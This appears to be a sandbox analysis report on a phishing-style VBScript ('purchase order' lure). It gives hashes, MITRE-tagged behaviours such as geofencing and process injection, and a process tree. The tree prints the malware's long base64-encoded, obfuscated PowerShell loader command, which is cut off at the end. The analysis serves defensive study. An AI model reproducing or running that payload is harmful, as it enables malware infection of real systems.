dfe9ab21fe124997b7f6b2399e42a101f6f023a69eb57e461b7ef1fd016d52a3

General

Target

SATIN ALMA EMRI #BRN3C922022.vbs
Size

228KB
MD5

91795c4a6aba224d0d6d4e78084a9367
SHA1

b9bd48e835540a6732d81d7186a54064b92bfa55
SHA256

35b531c09127533bec6d252aa84233f2b233e578b86c90be5072c2015019e8be
SHA512

0e341edacc186e41c54bfe512882d5378746c2cb3969d7b27781ee6166bad85d41ff333eba3edfb13fbbcd7c8e90acc6eea3aa6e4f0fa342d3ccb9f3c2053235
SSDEEP

6144:hKD8oXovN76Rbc9ykOEXNxkfONRcBzSQ3GbpOMEFfiS:hKBw8RbzkOsxVNRc4uGMr

Score

7^/10

Malware Config

Signatures

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation	WScript.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
4956	powershell.exe
4956	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	4956	powershell.exe

Suspicious use of WriteProcessMemory 9 IoCs

description	pid	Process	procid_target
PID 3208 wrote to memory of 4956	3208	WScript.exe	80
PID 3208 wrote to memory of 4956	3208	WScript.exe	80
PID 3208 wrote to memory of 4956	3208	WScript.exe	80
PID 4956 wrote to memory of 632	4956	powershell.exe	87
PID 4956 wrote to memory of 632	4956	powershell.exe	87
PID 4956 wrote to memory of 632	4956	powershell.exe	87
PID 632 wrote to memory of 1076	632	csc.exe	88
PID 632 wrote to memory of 1076	632	csc.exe	88
PID 632 wrote to memory of 1076	632	csc.exe	88

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\SATIN ALMA EMRI #BRN3C922022.vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3208
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -e "JABEAGEAdgB5AGsAbABhAHAAcABlACAAPQAgAEAAJwANAAoAQQBuAGEAbAB5AEEAUABvAGwAaQB0AGQAUwB1AHAAZQByAGQARwBvAG0AbABhAC0ARQB4AGEAYwBlAFQAVAByAG8AbABsAHkARABvAGIAZQByAHAAcgBlAHAAYQBuAGUAcwBrAGEAdgBlACAAVQBzAHQAYQBuAC0AQwBvAG4AZABvAFQAcABlAHoAaQB6AHkAYwBvAG0AcABvAHAAQgBvAGcAcwB0AGUAUwBsAHUAZAByAEQATABpAGsAdgBpAGUAUwBlAGoAcgBzAGYAUwBpAGwAawBlAGkAUwBlAGsAcgBlAG4ASABvAHYAZQBkAGkARQBsAGUAYwB0AHQAQwBoAGEAegB6AGkAbgBpAGsAbwAgAG8AUwBsAGIAZQB2AG4AbgBvAG4AZABlACAASABhAGkAbABzAEAAUwB0AGUAZQByACIACgBDAG8AdQBuAHQAdQBJAHMAbwBlAGwAcwBTAHAAZQBsAGwAaQBFAG4AZQB0AGkAbgBUAG8AcwAgAEgAZwBTAHQAdgBrAG4AIABMAGkAdABpAGcAUwBBAGYAZgBpAHIAeQBJAG4AaABpAGIAcwBOAHUAegB6AGUAdABzAGEAbQBzAGUAZQBEAHkAcgBlAGUAbQBzAGUAagBsAGsAOwAKAEIAZQBnAHkAbgB1AEMAYQBtAHAAaQBzAEwAdQBsAHUAcwBpAFQAZQBrAHMAdABuAEsAbABlAG0AbQBnAFMAdABvAGUAdAAgAEEAZgB2AGIAbgBTAEEAcwBzAHkAdAB5AE0AaQBsAGkAdABzAE0AbwBuAGUAdAB0AHQAdQBnAHQAZQBlAGoAdQBsAGUAbQBtAGIAZQBrAGUAbgAuAEYAaQBsAGUAdABSAEMAeQBuAGkAYwB1AEQAZQBsAHQAbwBuAFAAeQBqAGEAbQB0AFMAawBpAHIAbQBpAEgAbwBsAGkAcwBtAFMAbwByAHQAaQBlAFAAaQBnAG4AbwAuAFQAbwBiAGEAawBJAEUAbABpAHMAIABuAEcAcgBvAGEAbgB0AFAAcgBlAGEAbABlAFMAcABsAGkAbgByAEIAZQBrAGwAZABvAE4AbwB0AGEAIABwAFMAawByAGwAbABTAFAAZQBuAGQAdQBlAEUAdAB5AG0AbwByAEsAbgBzAHIAbwB2AEgAYQBsAHYAdABpAFAAbwBzAHQAcABjAE8AcgB0AGgAbwBlAE0AYQB0AHQAaABzAEoAbwBsAGwAZQA7AAoARQBrAHMAZQBtAHAATQBhAGQAawB1AHUAQwBhAHYAYQBsAGIAcwBtAHUAdAB0AGwAVQBkAHYAaQBzAGkAVwBlAGQAYgBlAGMAQQBuAGQAZQBsACAAQQBuAGcAcgBlAHMAVABvAG4AdABvAHQAQQBtAGEAbAB0AGEAUwBlAG4AbwByAHQAWQBhAGMAaABhAGkAQwBoAGUAYwBrAGMAQQBtAGYAZQB0ACAATwB3AHMAZQByAGMARABrAHMAdABvAGwAVABlAGsAcwB0AGEARgBqAGUAcgBkAHMAQQBtAHQAcwBmAHMAUwBwAG8AdAB0ACAATwBkAGUAYQAgAFYAQQBuAG4AYQAgAGkATQBpAG4AaQBtAHIAVQBuAGQAcwBpAGsAUwBlAG0AaQBzAGUARQBmAHQAZQByAGwAVgBpAGwAZgBvADEACgBHAGUAbgBpAG4AewBNAGkAbABpAGUAWwBTAHQAcgBpAGEARABCAGEAZwBiAGkAbABNAHIAawB2AHIAbABHAGwAbwBiAGUASQBwAHIAZQBzAHUAbQBJAG4AZABsAG8AcABKAHkAbABsAGkAbwBEAGgAZgAgAEQAcgBBAHIAaQBzAHQAdABjAGkAZwBhAHIAKABUAHMAZQB0AHMAIgBQAHIAYQB0AHQAdwBSAGUAcAB1AGIAaQBMAGEAZwBkAGUAbgBDAGEAdABmAGkAcwB0AHIAZQBhAGQAcABUAHcAYQBlAHMAbwBNAGEAbABhAHIAbwBUAHIAbwBsAG8AbABEAGUAdABhAGMALgBDAGEAbQBwAGEAZABCAG8AYwBrAGkAcgBBAGYAbABhAGcAdgBUAGoAZQBuAGUAIgBIAG8AdQByAGwAKQBBAHAAcAByAGUAXQBTAHQAbwByAHQAcABUAGkAZABpAGwAdQBPAGYAZgBpAGMAYgBUAGUAbABmAG8AbABSAGUAagBuAGYAaQBHAGwAbwBzAGEAYwBzAG8AdQB0ACAAIABPAGQAeQBzAHMAcwBGAGwAbwByAGkAdABBAHIAYQAgAFYAYQBQAGkAbgBiAG8AdABCAHIAdQBkAGYAaQBUAHkAZABlAGwAYwBLAHIAZgB0AHIAIABDAHIAbwBzAHMAZQBSAGUAYQBjAHQAeABBAHIAdABoAHIAdABQAGwAaQBnAGgAZQBQAGUAcAB0AGkAcgBrAHYAaQBsAGkAbgBTAHAAaQBsAGQAIABVAHIAYgBlAGYAaQBGAGUAbAB0AHMAbgBEAGkAcwBwAG8AdABQAGkAbABlAG4AIABNAGEAawBhAGIAQQBMAHMAZQBwAHUAZABTAHAAZQBjAGkAZABTAG8AdgBlAHYARgBNAGUAcgBjAHUAbwBVAGQAcwBrAHIAcgBUAGEAYgB1AG8AbQBhAHMAcwBvAHIAKABTAGEAbgBzAGUAaQBSAGEAYQBkAGcAbgBFAHUAYwByAHkAdABCAHIAbwBrAGwAIABVAG4AZQBmAGYARABUAHIAdQB0AGgAaQBVAGQAZgByAGkAZwBCAGEAaQBsAGkALABCAG8AZgBsAGwAaQBVAG4AawBpAG4AbgBiAGkAbgBkAGUAdABQAGEAcwBzAGEAIABGAGkAbAB0AGgASwBrAHYAaQBsAGkAdQBBAG4AZABlAG4AbABBAGcAZwByAGUALABSAGkAcwB0AHMAaQBTAHQAcgBvAGIAbgBMAGEAbgBkAHMAdABVAG4AdgBpAGcAIABCAGEAYgBhAGkAQQBKAHUAbgBnAGUAZQBJAG4AZABmAHIAYwBtAG8AbgBzAHUAaQBCAGUAbABpAGcAbwBQAHIAZQBuAG8AdABUAHIAcwB0AHUAKQBUAHIAYQBzAGYAOwAKAFQAcgBlAGgAagBbAFAAaAB5AGwAbABEAEYAdQBtAGUAbABsAFMAawByAG8AdABsAFMAawB5AGwAbABJAFUAbgBkAGUAbABtAFMAdQBwAGUAcgBwAEEAcgBzAGUAbgBvAEwAYQB5AGwAbwByAFMAdwBpAG4AZwB0AEUAcgBnAGEAcwAoAEMAaABhAHIAaQAiAEYAbwByAHMAcABrAEEAbABrAHkAbQBlAEsAaQBzAHQAZQByAFUAZABvAG0AZQBuAFAAZQBkAGEAZwBlAFQAYQBhAHIAZQBsAEQAYQBhAHIAbAAzAFMAeQBzAHQAZQAyAEUAcgBuAHMAdAAiAEwAaQBuAGQAZQApAFMAeQBsAHYAYQBdAFYAYQBzAHMAYQBwAFMAawBhAGIAIAB1AEYAbwByAGUAbABiAEYAdQB0AGgAbwBsAE4AbwBuAG0AdQBpAEcAdQBlAHIAaQBjAE0AYQBuAG4AaQAgAEcAZQByAG0AYQBzAFMAaQB0AGQAbwB0AEQAaQBhAHIAaQBhAFkAbgBnAHMAdAB0AEkAbgBkAHUAbABpAFQAZQByAG0AaQBjAFIAZQBwAHIAYQAgAEQAawBzAHMAdABlAEEAdgBhAHMAYwB4AFAAaABvAHQAbwB0AE0AaQBuAGkAaABlAEMAbwB1AG4AcwByAFMAdAByAGkAZABuAEYAdQBtAGEAcgAgAEwAZQBnAGUAbgBpAEEAcgBtAGkAcwBuAE8AeQB2AGkAbgB0AHQAaQBsAHMAawAgAEQAYQBuAGsAbgBWAEsAYQBsAGsAIABpAEYAbwByAHMAawByAEQAagByAHYAZQB0AFIAeQB0AG0AaQB1AFUAZAB2AGkAawBhAEgAbwBtAG8AYwBsAGUAZgB0AGUAcgBBAEkAbgBkAHYAYQBsAGUAbgB3AGkAcwBsAEkAcwBvAHAAbwBvAFAAaABpACAASABjAHIAZQB0AHIAbwAoAEUAbQBwAGEAdABpAFAAcgBvAGcAcgBuAEEAbABsAGUAcgB0AEsAYQBsAG8AcgAgAFIAZQBqAHMAZQB2AEUAeABvAHMAcAAxAFMAdAB5AHIAZQAsAFMAYQBsAHAAIABpAFYAZQByAGQAZQBuAFIAZQBpAHQAZQB0AEUAdgBhAGwAdQAgAEMAeQBjAGwAbwB2AEQAaQBzAG8AYgAyAEMAbwB3AHIAbwAsAFIAZQBnAGcAZQBpAEgAeQBwAGUAcgBuAFMAaABhAG0AcAB0AE4AYQB0AHQAZQAgAFMAZQBtAGkAbQB2AFMAdQBwAGUAcgAzAFMAdABlAGQAbQAsAFMAdQBiAGoAZQBpAFQAaAByAGUAYQBuAE8AdQB2AGUAcgB0AFEAdQBhAGQAcgAgAFAAaQBjAGsAdQB2AEUAYwBoAGUAbAA0AGQAbwBtAGsAaQApAEIAdQB0AGEAZAA7AAoARwBhAGwAbABvAFsARABlAG0AbwBuAEQARABvAGEAbgBkAGwAVgBlAGkAbgBpAGwASABvAHIAbQBvAEkAVABhAGwAbABlAG0AQQByAGIAZQBqAHAAQQB1AHQAbwBkAG8ASABqAHMAawBvAHIAWQBhAGsAawBlAHQASQBuAGQAcwB5ACgAaQBtAHAAbwBsACIAUwBuAGEAawBrAGcARwBlAG4AaQAgAGQAUgBhAHAAYQBuAGkASwBpAHQAdABsADMARABpAHMAdABpADIASABqAG4AZQBzACIAQgB5AGcAZQBuACkAUgBlAGgAYQBiAF0AUgBlAHQAcwBsAHAAUwBlAGUAYgBlAHUAUAB1AGUAYgBsAGIATgBpAGsAIABXAGwAQwBoAHIAbwBtAGkAUwBsAGEAbgBnAGMAUwBhAHQAaQByACAAQQBuAHQAaQBsAHMAVABvAGIAYgB5AHQASABvAHYAZQBkAGEARgBpAGwAbQBzAHQAUwBpAGQAZQBmAGkATQBvAHMAdABpAGMAQgBlAGIAbwBlACAATwBwAGsAcgBzAGUAQQBmAGYAbABhAHgAVQBuAGQAZQByAHQAVQBwAGcAYQBwAGUAUwB0AHIAaQBkAHIASQBuAHMAdAByAG4AUgBhAG0AaQBmACAAUgBlAGsAbwByAGkAVgBhAGEAZABiAG4AVABqAGUAawBrAHQARAByAG8AZwBoACAAZQBuAGMAbwBwAFMAUAB1AHIAZwBlAGUAUABhAHAAZQByAHQAQgBsAHIAZQBiAFAAUAByAGMAaQBzAGkARwBvAG4AYQBwAHgAQQByAGIAZQBqAGUARgByAG8AcwB0AGwAVABlAGsAcwB0AEYATwB1AHQAcABhAG8AcAByAGUAaQBuAHIAQQBtAHkAZwBkAG0AQQB4AGkAYQB0AGEAQgByAG4AZQB2AHQAYQBwAGgAcgBvACgAUwBwAGwAZQBlAGkAQgBpAGQAZQAgAG4ATQBlAG4AYQBnAHQAUwBjAHIAdQBtACAAUgBlAG0AaQBuAEQATwB2AGEAdABvAGkAQgBsAGkAbgBkAGEARgBvAHIAZQBiADEAUABpAG4AbgBvADYAVQBuAGQAZQByADAASgBvAHUAcgBuACwAQwBvAHMAaABlAGkAYgByAG4AZABlAG4AQwBvAG4AdABpAHQASQByAGkAZABpACAAdABpAGwAbAByAEEARABlAG4AcwBhAHAAaQB0AGEAbQBhAHQAdQBkAGwAdQBmAGUATQBlAGQAaQBjAHIAUgBlAHMAbwBsACwATwB6AG8AbgBlAGkAUwB0AGEAdABzAG4AVABlAGwAZQBnAHQARQBtAHAAcgBpACAAUgBlAG0AaQBzAEQAQwBoAGEAdgBlAGUAUABoAG8AdABvAGIATQBvAHIAZwBlAGkAQgBpAGcAYQBtAHQAUgBvAG8AcwB0ADEAVgBvAHQAYQByADkATQBlAGwAYQBnADYARAB5AHIAZQBoACkAUwBrAHkAbABkADsACgBPAHYAZQByAGQAWwBCAGEAbgBhAGwARABUAHIAbwBuAGYAbABQAGwAYQBjAGUAbABmAHIAZABpAGcASQBNAGkAcwBjAG8AbQBMAGkAbgBlAG4AcABCAG8AbwBrAHMAbwBWAG8AbABhAHAAcgBPAHYAZQByAHMAdABTAGUAbAB2AGUAKABuAGUAaQBnAGgAIgBZAG8AdwBlAGQAdQBNAGkAbgBpAG0AcwBTAHQAYQByAHQAZQBVAG4AZABlAGYAcgBVAGQAcwB1AGcAMwBZAGEAdABhAGcAMgBBAGYAZgB5AHIAIgBTAGkAZABlAGwAKQBVAGEAZgBtAHIAXQBOAG8AbgBmAGkAcABEAHUAYwBrAHcAdQBTAHQAZQBqAGwAYgBUAGEAagBlAHMAbABCAGwAYQBkAGgAaQBGAGkAbgBlAGwAYwBDAGwAYQB4AG8AIABVAG8AcABkAHIAcwBwAGEAdAByAHUAdABSAGkAZABkAGwAYQBCAG8AawBzAGUAdABGAG8AcgBzAGkAaQBNAGkAZABkAGUAYwBiAGUAcgBlAGcAIABTAG8AYwByAGEAZQBLAGEAbABrAHUAeABPAHQAbwBsAGkAdABCAG4AawBoAGEAZQBTAHQAagBlAHIAcgBOAG8AbgB3AGEAbgBTAGEAZgByAGEAIABmAGoAZQByAG4AaQBCAHIAYQBjAGgAbgBHAGwAdQBtAG8AdABQAGkAYwB0AHUAIABNAGkAYwBoAGUAUwBDAGgAYQBsAGwAZQBEAHIAZQBhAGQAdABBAG4AYwBpAGUARABBAGIAbwB2AGUAbABDAG8AbgBjAGUAZwBTAGUAbgBzAHUASQBJAGQAZQBvAGcAdABUAGkAbgBmAG8AZQBGAHIAbABhAGEAbQBVAHYAYQBuAGwAVABNAGkAYwByAG8AZQBBAGYAcwB0AGUAeABTAHAAZQByAG0AdABTAGEAdQBkAGkAKABNAGEAZAB2AGEAaQBHAGEAYgBiAHkAbgBBAHIAdgBlAHMAdABQAGwAYQB1AGQAIABSAGUAZwBpAHMAQgBvAHYAZQByAHQAYQBTAGUAcgB2AGkAcgBFAHgAYQBjAHQAcQBTAGsAZQBwAHQAdQBSAGUAYwBpAHQAZQBQAGUAbgB0AHkALABBAGYAZwByAHMAaQBTAGEAbgBkAHMAbgBLAHkAbABsAGkAdABHAGEAbABtAGEAIABQAGEAcgB0AHcARgBmAG8AZABiAG8AYQBTAG4AawBzAG0AcwBNAG8AcgBhAHYALABVAG4AawBuAG8AaQBVAGQAYgByAHkAbgBNAHUAcgBwAGgAdABaAHkAbQBvAHQAIABMAG8AYgBhAHQAVQBLAGwAYQBwAHIAbgBWAHIAZABpAG0AZABBAG4AZQBzACAAZQBjAGgAaQBuAGIAcgBiAGUAbQB5AG4AKQBTAHQAcgBpAG4AOwAKAEYAbABsAGUAcwBbAFMAYQBuAGQAaABEAEYAaQBuAGoAdQBsAFMAeQBzAHMAYQBsAFUAbgBjAGUAaQBJAFAAYQBhAHMAawBtAEYAbwByAHMAawBwAHYAYQBkAGUAZgBvAFMAawBhAHQAdAByAFYAZQByAGQAZQB0AHMAbABhAGIAYgAoAGcAZQBuAHMAaQAiAGUAbQBwAGkAcgB3AE0AaQBjAHIAbwBpAEQAZQBnAGEAZwBuAFQAaABvAHIAYQBtAFMAdABlAG0AbQBtAEgAbgBuAGkAawAuAEQAaQBwACAAQgBkAEIAbABpAGQAaABsAFMAcABvAGwAZQBsAFAAYQByAGsAZQAiAEUAbABlAGsAdAApAFAAYQBhAHMAawBdAFMAdQBiAGoAZQBwAFAAYQBuAGgAZQB1AEYAbABhAG4AZQBiAHUAZABhAHMAZQBsAE8AcgBhAG4AZwBpAEgAeQBwAG4AbwBjAGQAbwBsAGwAYQAgAEsAcgB5AGQAcwBzAGwAZQB0AHQAZQB0AFMAZQBrAHMAbwBhAEsAbwByAHQAcwB0AFUAZABoAGEAbABpAFUAbgBhAHcAawBjAFMAdABhAG0AYgAgAFQAYQBpAHAAYQBlAEIAbwB1AHMAdAB4AHMAcABlAGMAdQB0AHAAYwBhAG4AZQBlAFMAZQBuAG4AZQByAHMAcABlAGUAZABuAEYAcgBpAHMAaQAgAHIAdQBzAHMAZQBpAGoAdQBuAGsAZgBuAFMAYQBnAGwAaQB0AFAAaQBjAG8AcwAgAGMAaABpAGUAbAB0AFQAbwBzAGsAaQBpAE0AaQB0AGkAZwBtAFMAawBuAGwAaQBlAEIAZQBrAGUAbgBTAE0AbwByAHUAYQBlAFYAYQBmAGYAZQB0AEQAZQBkAHUAYwBFAFMAeQBuAHMAbwB2AEIAZQBhAHUAdABlAFAAYQByAGwAYQBuAEIAdQByAGUAYQB0AEIAZQBzAHQAaQAoAG0AaQBsAGUAcABpAEEAcgBsAGUAdABuAFQAaQBsAGwAZwB0AEgAZQByAHMAawAgAE4AYQB0AGkAbwBUAFMAZQBpAHMAZQBpAFMAYQBuAGQAZQBsAFAAcgBvAGUAdABzAE8AdgBlAHIAcwAsAG8AdgBlAHIAYwBpAEYAbwByAGYAZABuAFMAawByAHYAZQB0AFMAbwBsAGQAYQAgAEwAdQBzAHQAcwBNAE4AbwBiAGIAbABhAGYAbwByAGQAZQBpAHUAZgBvAHIAZAAsAG4AbwBuAGMAZQBpAEgAYQBnAGkAbwBuAFkAbwB1AGQAIAB0AFIAZQBkAG8AYwAgAFMAawBvAHYAbQBTAFUAZABzAGEAbgBlAFUAZABtAGEAdAByAE0AYQBpAGQAZQBmAGoAZQBhAG4AZQBoAFYAdQBnAGcAZQBvAEsAbwBtAG0AdQAsAFMAcABhAGQAZQBpAFUAZABsAGkAcwBuAFIAZQBqAG8AaQB0AFIAYQBuAGQAaQAgAEYAbwByAG0AYQBDAFMAawByAGEAYgBhAFMAdQBiAHAAcgB1AEQAZQBmAGkAbAAsAFMAawB5AGcAZwBpAFQAcgBpAGEAbABuAFMAYwBhAGwAYQB0AEcAbwBtAHAAaAAgAEEAZABhAG0AcwBOAEsAcgBuAGkAawBvAFMAbABhAGcAdgBuAEoAbwBuAGEAcwApAEEAZgBoAHUAZwA7AAoAUwBrAGEAbABkAFsAUABhAG4AYwBvAEQAQgBsAG8AdABsAGwAQwBvAGwAegBhAGwAQgByAG4AZQBnAEkATgBhAHQAaQB2AG0AVABlAGsAcwB0AHAAVQBuAGcAZABvAG8ATgBlAGcAZQByAHIATgBhAHMAYQByAHQAQwBlAHAAIABDACgAQgBpAG4AZABlACIAUwBoAGEAbQBvAGsAQgBlAG4AegBvAGUAQQB0AHQAaQByAHIARABpAHMAZQBtAG4ARwBlAG4AZABhAGUAZQBmAGYAZQBrAGwAUwB0AGEAZABmADMARwBlAG8AcgBnADIAUwBrAGkAYgBzACIAQQBnAGcAaQBzACkAUABhAHcAawBlAF0AVgBhAG4AZABnAHAATQBpAGwAagBiAHUAUwB2AGEAYgByAGIAUwBuAG8AcgB0AGwAUwB1AGIAYQBsAGkAUAByAGkAbwByAGMARgBpAG4AYQBuACAAQwBpAHIAawB1AHMATQBhAGwAYQBjAHQARQBuAGMAZQBmAGEAUgBlAHAAdABpAHQAZgByAGsAawBlAGkARQB1AHIAbwBwAGMASABvAHcAcwBvACAAUwBwAHIAaQB0AGUAQgBhAHIAbgBlAHgAQgB1AGwAbABlAHQATABvAHQAdABlAGUAUgBlAGMAdABpAHIATABvAGMAYQBsAG4AUQB1AGEAcwBzACAAbABhAGEAbgB0AGkASwBhAG0AcABkAG4AZABpAGMAaABvAHQAQwByAG8AdQB0ACAASABpAGQAZgByAFIATgB5AGsAIABOAGUATwBwAHMAaQBnAGEASwBuAG8AbABkAGQAQQBuAGUAcwB0AFAATQBpAHMAdAByAHIAVABoAGUAbQBpAG8AVgBpAGwAbAB1AGMAVgBlAG4AZABlAGUAVABvAGcAYQAgAHMATwByAGEAbABmAHMAQgBhAG4AdABhAE0AUABoAG8AdABvAGUAVQBuAG4AbwB0AG0AUwBoAGUAaQBrAG8AcgBvAGQAcwBrAHIAVQBuAGUAbgB3AHkARABlAGMAYQBuACgAQgByAGEAaQBuAGkAUwB0AHIAZwBrAG4ATABnAGUAbQBpAHQAVABlAG4AcwBpACAAQgByAGEAdABzAFYAUwBwAGkAcgBlAGUAUABoAGUAbgBvAHIASQBuAGMAdQBzACwAYwBvAG4AdgBlAGkASQBuAHQAcgBhAG4AUABhAGwAbQBlAHQAUwBjAHIAdQB0ACAAQgBlAGwAYQBuAE0AUABvAHAAcABhAHkATwB2AGUAcgBzAHQAVAB2AHIAcwB0AGgARgBvAHIAYgBlACwATQBhAGQAZABpAGkAUwB1AGIAYgBvAG4ATAB1AG0AaQBuAHQAQwByAGUAcABlACAASwBvAG4AZwBlAEEAQQBuAHMAZwBlAGsAUwB1AGIAaQBuAGEATwBwAGQAcgBhAHYASwB1AHMAaQBuAGUAQgBpAG8AaABlAGQARgBlAHIAbQBhADQARQB4AGEAbAB0ADAAVAByAGEAbgBzACwAVABvAG4AaQBjAGkAUwBoAGEAZwByAG4ASABlAG0AYQB0AHQASwBhAHIAdwBpACAAQgByAG4AZQBvAFYATABvAGUAaQBuAHUARwBhAHMAdAByAGwAVQBuAHMAdQBwADEARABpAGsAdABpADgARQBkAHMAdgBvADAAUwBwAGUAYwBpACwAYQBuAGwAaQBhAGkAZgByAGkAaABlAG4ASABlAHIAbABpAHQARABlAGYAcgBvACAATABlAHYAYQBuAFUAUwBvAGwAaQBkAGQASwBvAG0AbQB1AHMAUwBpAHQAegBtAHAAVABhAG0AYQBuAGUAVQBuAG0AbwBuAGsATQBvAGIAaQBsACkARABhAGcAbABpADsACgBTAGUAdgBlAHIAWwBCAHUAdABvAG0ARABTAGMAaABlAG0AbABFAGMAaABvAHAAbABVAG4AZABlAHIASQBIAHkAcABuAG8AbQBFAGwAZQBrAHQAcABCAGEAZABlAHYAbwBTAGEAbQBtAGUAcgBUAGEAbgB0AGEAdABUAGkAZABzAHIAKABDAHkAYwBsAG8AIgBVAGQAcwBhAGUAZwBXAG8AbwBkAHMAZABFAHgAYQBsAHQAaQBUAGkAbABsAHUAMwBHAGwAZQBnAG4AMgBNAG8AdQByAG4AIgBBAGwAdABpAG4AKQBiAHIAYQBpAG4AXQBLAGkAbABvAHAAcABHAGwAeQBrAG8AdQBPAG0AZwBpAHYAYgBGAGEAbgBnAG8AbABTAHAAYQByAHQAaQBOAGkAZQBjAGUAYwBIAHUAbgBkAHIAIABNAGEAbQBtAGkAcwBUAGkAbABzAGsAdABDAHUAbAB0AGkAYQBNAG8AZQBuAHMAdABBAGYAcwBtAGkAaQBHAG8AbgBpAHQAYwBFAGwAZQBrAHQAIABFAGsAcwB0AHIAZQBNAG8AdABpAGwAeABIAHkAZQBuAGEAdABQAGwAZQBuAGEAZQBUAGUAbQBlAG4AcgBGAHIAaQBlAGQAbgBDAGgAYQBtAGkAIABVAG4AbAB1AGMAaQBCAHUAcgBpAGUAbgBCAGkAbwBwAGgAdABGAGwAaQBtAHIAIABQAGUAbgBuAGEAUwBVAG4AcABsAGEAZQBNAGEAegBpAG4AdABTAG0AcgBlAGgAQQBOAG8AbgBlAHgAcgBVAG4AZABlAHIAYwBGAHUAbgBrAHQARABIAGUAcgBlAHMAaQBMAHUAbQBtAGUAcgBNAHIAcwBrACAAZQBPAHYAZQByAGIAYwBGAG8AcgB0AHIAdABBAG4AbABnAHMAaQBNAGEAagBvAHIAbwBTAHUAcABlAHIAbgBOAG8AbgBhAHIAKABTAGkAbQBiAGEAaQBCAGwAbwBuAGQAbgBBAHMAYQByAG8AdABWAHIAYQBuAGcAIABVAG4AZABlAHIAQQBEAGUAcgBtAGkAZgBjAGgAYQBiAGwAcwBjAGEAbgB5AG8AawBLAGkAbgBrAGkAZQBOAGEAdQB0AGkAZABUAGUAZwBuAGUALABTAGsAdQBtAGIAaQBSAGUAYwBvAHYAbgBSAGEAdAB0AGUAdABNAGkAcwB0AGkAIABNAG8AcgBmAGkAVABFAHQAaABlAHIAaQBHAGwAbwBzAHMAdAB2AGUAcgB0AGkAKQB1AGQAcwBpAHYAOwAKAEUAeABjAHUAcwBbAEEAZwB1AHIAawBEAFMAYQBtAG0AZQBsAEYAYQByAHYAZQBsAGUAcwB0AGEAYgBJAFIAcgBoAGEAdABtAEIAYQBhAGQAcwBwAE4AYQB2AG4AZQBvAE0AYQBnAGkAcwByAGQAZQBtAG8AZAB0AEEAYwBjAGUAbAAoAHoAdQBjAGMAbwAiAFQAYQByAHQAYQBrAEUAbABhAHQAcgBlAFQAaQBsAGgAbwByAEYAbwByAG0AbwBuAE0AYQBuAGQAcgBlAFQAcwBlAG4AIABsAFQAcgBpAGUAdAAzAFMAbQByAHIAZQAyAEIAcgBlAGEAZAAiAEgAZABlAHIAcwApAEYAbwByAHQAbgBdAEEAYwBjAGUAcABwAFQAZQBtAHAAZQB1AEMAaQBzAHAAbABiAFYAbwBsAGQAcwBsAEcAcgBhAGEAZwBpAFAAYQBwAGUAcgBjAFIAdQBtAG8AdQAgAEcAZQBqAHIAcwBzAFUAbgBlAHgAcAB0AEYAbwByAHAAYQBhAEYAYQB0AHQAaQB0AEgAZQB4AGEAYwBpAFMAYQBwAHMAawBjAE0AYQBjAHQAcgAgAEYAbABlAHQAdABlAFAAbABlAG4AdQB4AFYAYQBnAHQAcwB0AFQAYQBtAHQAYQBlAE0AbABrAGUAawByAFMAawBhAGQAZQBuAEwAZwBuAGEAZwAgAG0AYQBzAGsAZQBJAEYAbwBvAGwAaABuAFUAbQB0AHQAZQB0AEYAbwB0AG8AcwBQAE0AbwB1ACAAVgB0AFQAaQBsAGIAYQByAEYAdQBuAGUAYgAgAFIAaQBkAGwAZQBFAE0AdQBnAGYAdQBuAFAAcgBlAHAAbwB1AEcAYQByAGEAZwBtAEkAcwBvAHAAZQBTAFcAZQBpAGcAaAB5AEsAZQByAG4AZQBzAEQAaQBzAHMAZQB0AFMAbABhAGwAbwBlAFYAZQBkAHQAYQBtAEMAbwBtAGUAdABMAEwAYQBzAHQAZQBvAEIAbABvAGQAcABjAEwAaQBiAGUAbABhAHQAbwB1AHAAIABsAHMAcABlAGQAYQBlAEsAaQBtAG8AbgBzAFAAcgBvAG4AbwBBAEYAbwByAHMAZwAoAEcAYQB1AGwAdAB1AFQAcgBvAGYAZQBpAEUAZgB0AGUAcgBuAFIAZQBwAHIAbwB0AEwAYQBuAGQAcwAgAEUAZgB0AGUAcgB2AFQAcgB1AG0AcAAxAEwAdQBnAHQAdQAsAEIAaQBzAHAAZQBpAEMAbwBuAHQAcgBuAE0AaQBsAGkAdAB0AGIAaQB0AHQAZQAgAGQAbwBtAHMAYQB2AFQAdQBpAHQAaQAyAEUAcgBzAHQAYQApAFMAdQBsAGYAbwA7AAoAUABlAG4AZwBlAFsATABhAGIAcwBhAEQATABpAGwAYQAgAGwAQgBsAG8AawBoAGwAUABhAGwAbQB1AEkAVQBkAGwAYQBhAG0AUwBsAG8AYQBuAHAASAB5AGwAZABlAG8ATABvAGsAYQBsAHIAdwBpAHQAdABlAHQAVQBuAG0AZQBsACgAUABuAGUAdQBtACIAVABlAHIAbQBpAGsAVQBuAG8AZABvAGUASQBuAHYAZQBuAHIAVQBuAGQAZQByAG4ARQBnAGUAdAByAGUAVQBkAGUAbAB0AGwASgBvAG4AaQBuADMATQBhAGEAZwBlADIAVwBpAHIAZQBtACIASwBlAG4AdwBpACkAUwBuAGIAZQBsAF0AVQBuAGEAcABwAHAAUwB0AGEAbgBnAHUATwBwAGsAYQBsAGIAYQB1AHQAbwBoAGwAZQBuAGsAZQBwAGkAUABhAHMAdABvAGMATgBvAG4AcwBjACAAQgBvAGwAZABrAHMAQgByAHUAZwBzAHQAUgBhAGEAcwB0AGEAUwB0AHIAbQBwAHQAbABlAHYAZQBhAGkAUABpAHAAcgBvAGMAcABvAHMAdABrACAATwB2AGUAcgBrAGUARgBlAGoAZQBiAHgAUgBlAGQAcgBpAHQAUgBlAGMAdABvAGUAUwB0AG8AcgBtAHIAQQBwAHAAcgBvAG4AQQ